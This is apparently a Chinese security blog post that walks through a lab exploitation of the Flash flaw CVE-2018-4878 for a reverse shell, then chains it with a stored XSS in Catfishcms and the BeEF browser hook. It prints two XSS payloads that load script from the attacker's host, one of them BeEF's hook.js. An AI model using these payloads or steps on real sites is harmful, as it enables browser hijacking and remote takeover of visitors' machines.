Hello,各位小伙伴大家好~
这里是你们消失已久的小编...
拖更一时爽,一直拖更一直爽...
今天来看看CVE-2018-4878结合BeEF的利用吧~
Part.1
CVE-2018-4878
漏洞利用
CVE-2018-4878:
攻击者可以构造特殊的Flash链接,一旦用户用浏览器等方式访问此Flash链接,就会被“远程代码执行”,直接被getshell。
针对此漏洞,网上已经有成熟的利用代码了,公众号直接回复CVE-2018-4878即可下载。来看看怎么利用吧~
首先使用msfvenom生成一段python类型的shell代码:
查看生成的代码如下:
然后我们打开下载的CVE-2018-4878利用脚本,将以下部分替换为上面的代码即可:
查看该利用脚本,可以看到脚本执行后会在root目录下生成两个文件:
通过python执行脚本:
接着开启apache2服务,并将生成的两个文件剪切到apache根目录下:
在kali上开启监听,接收反弹shell:
攻击端配置完毕~~
在靶机需要安装版本<= 28.0.0.137的flash,公众号直接回复CVE-2018-4878即可下载:
安装完毕后,使用浏览器访问kali攻击页面:
可以看到kali顺利getshell:
查看靶机系统信息:
如果此时靶机关闭浏览器,session则会断开:
注:如果浏览器版本过高,访问攻击页面时,浏览器不会执行flash插件:
//此处为firefox 71.0,需要手动点击执行flash才行。
Part.2
BeEF
BeEF的利用
在前面我们讲过使用存储型XSS进行网页挂马:
【XSS漏洞】通过XSS实现网页挂马
这里我们也来试试这种操作。
公众号回复CVE-2018-4878,下载安装存在存储型XSS的Catfishcms(DVWA也可以)
该CMS评论区存在存储型XSS:
留言后使用burp抓包,插入以下js脚本:
</tExtArEa>'"><sCRiPt sRC=http://192.168.31.54/index2.html></sCrIpT>
访问评论区,可以看到留言成功:
查看网页源代码,成功插入XSS:
但是kali并没有getshell:
是因为这种方法并不会执行flash脚本。
这里我们试试一款kali自带的工具beef-xss:
运行beef:
访问http://192.168.31.54:3000/ui/authentication即可登陆:
//登录名和密码默认都是:beef
我们将hook.js页面插入到存储型XSS处:
使用burp发包:</tExtArEa>'"><sCRiPt sRC=http://192.168.31.54:3000/hook.js></sCrIpT>
查看评论区留言:
可以看到BeEF上,靶机顺利上线:
在指令区使用重定向功能,将网页重定向到前面的攻击页面:
靶机的浏览器就会自动跳转到攻击页面,执行flash插件:
再查看kali,会发现成功getshell:
撒花完结~~
Part.3
结语
好啦,以上就是今天的全部内容了~
Peace!